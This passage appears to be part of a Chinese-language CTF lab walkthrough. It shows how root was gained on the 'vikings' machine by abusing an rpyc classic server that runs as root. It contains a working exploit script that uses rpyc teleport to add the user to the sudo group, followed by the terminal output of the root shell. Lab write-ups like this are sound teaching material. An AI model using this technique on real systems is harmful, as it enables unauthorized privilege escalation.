                             "a registry server. By default, the server will not attempt to register",
                             group="Registry")
    registry_type = cli.SwitchAttr("--registry-type", cli.Set("UDP", "TCP"),
                                   default="UDP", help="Specify a UDP or TCP registry", group="Registry")
    registry_port = cli.SwitchAttr("--registry-port", cli.Range(0, 65535), default=REGISTRY_PORT,
                                   help="The registry's UDP/TCP port", group="Registry")
    registry_host = cli.SwitchAttr("--registry-host", str, default=None,
                                   help="The registry host machine. For UDP, the default is 255.255.255.255; "
                                   "for TCP, a value is required", group="Registry")

    def main(self):
        if not self.host:
            self.host = "::1" if self.ipv6 else "127.0.0.1"

        if self.registry_type == "UDP":
            if self.registry_host is None:
                self.registry_host = "255.255.255.255"
            self.registrar = UDPRegistryClient(ip=self.registry_host, port=self.registry_port)
        else:
            if self.registry_host is None:
                raise ValueError("With TCP registry, you must specify --registry-host")
            self.registrar = TCPRegistryClient(ip=self.registry_host, port=self.registry_port)

        if self.ssl_keyfile:
            self.authenticator = SSLAuthenticator(self.ssl_keyfile, self.ssl_certfile,
                                                  self.ssl_cafile)
            default_port = DEFAULT_SERVER_SSL_PORT
        else:
            self.authenticator = None
            default_port = DEFAULT_SERVER_PORT
        if self.port is None:
            self.port = default_port

        setup_logger(self.quiet, self.logfile)

        if self.mode == "threaded":
            self._serve_mode(ThreadedServer)
        elif self.mode == "forking":
            self._serve_mode(ForkingServer)
        elif self.mode == "oneshot":
            self._serve_oneshot()
        elif self.mode == "stdio":
            self._serve_stdio()

    def _serve_mode(self, factory):
        t = factory(SlaveService, hostname=self.host, port=self.port,
                    reuse_addr=True, ipv6=self.ipv6, authenticator=self.authenticator,
                    registrar=self.registrar, auto_register=self.auto_register)
        t.start()

    def _serve_oneshot(self):
        t = OneShotServer(SlaveService, hostname=self.host, port=self.port,
                          reuse_addr=True, ipv6=self.ipv6, authenticator=self.authenticator,
                          registrar=self.registrar, auto_register=self.auto_register)
        t._listen()
        sys.stdout.write("rpyc-oneshot\n")
        sys.stdout.write("%s\t%s\n" % (t.host, t.port))
        sys.stdout.flush()
        t.start()

    def _serve_stdio(self):
        origstdin = sys.stdin
        origstdout = sys.stdout
        sys.stdin = open(os.devnull, "r")
        sys.stdout = open(os.devnull, "w")
        sys.stderr = open(os.devnull, "w")
        conn = rpyc.classic.connect_pipes(origstdin, origstdout)
        try:
            try:
                conn.serve_all()
            except KeyboardInterrupt:
                print("User interrupt!")
        finally:
            conn.close()

if __name__ == "__main__":
    ClassicServer.run()

同时进行权限查看

ragnar@vikings:~$ ls /usr/local/bin/rpyc_classic.py -lh
-rwxr-xr-x 1 root root 6.1K Sep  3  2021 /usr/local/bin/rpyc_classic.py

• 切换 shell 使用 bash -i

下面代码是在目标上执行，作用是进行 rpyc server 的请求，上面的 Python 登录是关于 rpyc server 的内容，不了解可以去百度

import rpyc
def shell():
    import os
    os.system('sudo usermod -a -G sudo ragnar')

conn = rpyc.classic.connect('localhost')
fn = conn.teleport(shell)
fn()

先确认 ss -pantu | grep 18812 端口是否开放，再执行 exp.py 然后再重新登录

ragnar@vikings:~$ python3 exp.py
ragnar@vikings:~$ sudo su root
[sudo] password for ragnar:
Sorry, try again.
[sudo] password for ragnar:
sudo: 1 incorrect password attempt
ragnar@vikings:~$ exit
exit
$ exit
Connection to 192.168.56.120 closed.

┌──(kali㉿kali)-[~]
└─$ ssh ragnar@192.168.56.120                                                                                                   1 ⨯
ragnar@192.168.56.120's password:
Permission denied, please try again.
ragnar@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  2 03:20:13 UTC 2022

  System load:  0.0               Processes:             95
  Usage of /:   52.3% of 8.79GB   Users logged in:       0
  Memory usage: 18%               IP address for enp0s3: 192.168.56.120
  Swap usage:   0%

0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Dec  2 02:56:08 2022 from 192.168.56.116
[sudo] password for ragnar:
Traceback (most recent call last):
  File "/usr/local/bin/rpyc_classic.py", line 130, in <module>
    ClassicServer.run()
  File "/usr/local/lib/python3.6/dist-packages/plumbum/cli/application.py", line 609, in run
    retcode = inst.main(*tailargs)
  File "/usr/local/bin/rpyc_classic.py", line 89, in main
    self._serve_mode(ThreadedServer)
  File "/usr/local/bin/rpyc_classic.py", line 100, in _serve_mode
    registrar=self.registrar, auto_register=self.auto_register)
  File "/usr/local/lib/python3.6/dist-packages/rpyc/utils/server.py", line 90, in __init__
    self.listener.bind(address)
OSError: [Errno 98] Address already in use
$ bash -i
ragnar@vikings:~$ sudo -s
# id
uid=0(root) gid=0(root) groups=0(root)

自此以获得 root 权限